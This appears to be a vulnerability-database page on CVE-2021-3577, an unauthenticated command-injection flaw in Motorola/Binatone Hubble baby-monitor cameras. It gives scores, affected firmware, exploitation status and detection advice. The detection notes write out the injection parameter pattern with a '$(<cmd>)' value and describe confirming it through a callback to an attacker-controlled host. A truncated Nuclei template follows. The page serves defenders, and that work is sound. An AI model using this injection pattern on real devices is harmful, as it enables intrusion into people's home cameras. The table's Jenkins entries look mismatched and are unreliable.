CVE-2021-3577
published 2021-11-12CVE-2021-3577: An unauthenticated remote code execution vulnerability was reported in some Motorola-branded Binatone Hubble Cameras that could allow an attacker on the same…
PriorityP184high8.8CVSS 3.1
AVAACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
59.89%
99.0th percentile
An unauthenticated remote code execution vulnerability was reported in some Motorola-branded Binatone Hubble Cameras that could allow an attacker on the same network unauthorized access to the device.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| binatoneglobal | comfort_85_connect_firmware | < 03.40.02 | 03.40.02 |
| binatoneglobal | focus_72r_firmware | < 03.40.00 | 03.40.00 |
| binatoneglobal | halo_+_camera_firmware | < 03.50.14 | 03.50.14 |
| binatoneglobal | mbp3855_firmware | < 03.40.00 | 03.40.00 |
| jenkins | git_plugin | — | — |
| jenkins | jenkins_core | — | — |
| jenkins | jenkins_lts | — | — |
| jenkins | jenkins_weekly | — | — |
| motorola | binatone_hubble_cameras | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Look for HTTP GET requests targeting the query parameter pattern `?action=command&command=set_city_timezone&value=$(<cmd>)` on IoT camera web interfaces — this is the exploit path for CVE-2021-3577 command injection. ↗
- →Confirm exploitation via out-of-band HTTP callback (OAST/interactsh): a successful injection will cause the device to issue an outbound HTTP request to an attacker-controlled host. ↗
- →Response body containing the string `set_city_timezone` alongside HTTP 200 status confirms the vulnerable endpoint is reachable and processed the injected command parameter. ↗
- →The vulnerability requires no authentication and is exploitable by any attacker on the same network segment (AV:A, PR:N per CVSS). Monitor for unauthenticated requests to `/?action=command` on Motorola/Binatone Hubble camera HTTP ports. ↗
- ·The Nuclei template uses `{{interactsh-url}}` as a placeholder for an out-of-band callback server; replace with a real OAST/interactsh endpoint when operationalizing the detection or exploit proof-of-concept. ↗
- ·Affected scope is limited to Binatone Halo+ camera firmware (cpe:2.3:o:binatoneglobal:halo\+_camera_firmware); detections should be scoped to that device family to reduce false positives. ↗
- ·Attack vector is Adjacent Network (AV:A), meaning exploitation requires the attacker to be on the same network as the camera — detections on internet-facing sensors will not capture this threat; focus on internal/LAN traffic monitoring. ↗
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.05.8MEDIUMAV:A/AC:L/Au:N/C:P/I:P/A:P
vulncheck8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-794m-w426-mg5p: An unauthenticated remote code execution vulnerability was reported in some Motorola-branded Binatone Hubble Cameras that could allow an attacker on t
ghsa_unreviewed·2022-05-24
CVE-2021-3577 [HIGH] CWE-863 GHSA-794m-w426-mg5p: An unauthenticated remote code execution vulnerability was reported in some Motorola-branded Binatone Hubble Cameras that could allow an attacker on t
An unauthenticated remote code execution vulnerability was reported in some Motorola-branded Binatone Hubble Cameras that could allow an attacker on the same network unauthorized access to the device.
VulnCheck
binatoneglobal halo\+_camera_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2021·CVSS 8.8
CVE-2021-3577 [HIGH] binatoneglobal halo\+_camera_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
binatoneglobal halo\+_camera_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
An unauthenticated remote code execution vulnerability was reported in some Motorola-branded Binatone Hubble Cameras that could allow an attacker on the same network unauthorized access to the device.
Affected: binatoneglobal halo\+_camera_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&host_type=src&vulnerability=cve-2021-3577; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-23&host_type=src&vu
No detection rules found.
Nuclei
Motorola Baby Monitors - Remote Command Execution
nuclei·CVSS 8.8
CVE-2021-3577 [HIGH] Motorola Baby Monitors - Remote Command Execution
Motorola Baby Monitors - Remote Command Execution
Motorola Baby Monitors contains multiple interface vulnerabilities could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
Template:
id: CVE-2021-3577
info:
name: Motorola Baby Monitors - Remote Command Execution
author: gy741
severity: high
description: Motorola Baby Monitors contains multiple interface vulnerabilities could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected device, potentially leading to unauthorized access, data theft, or further compromise of the network.
remediation: |
Apply the l
2021-11-12
Published
Exploited in the wild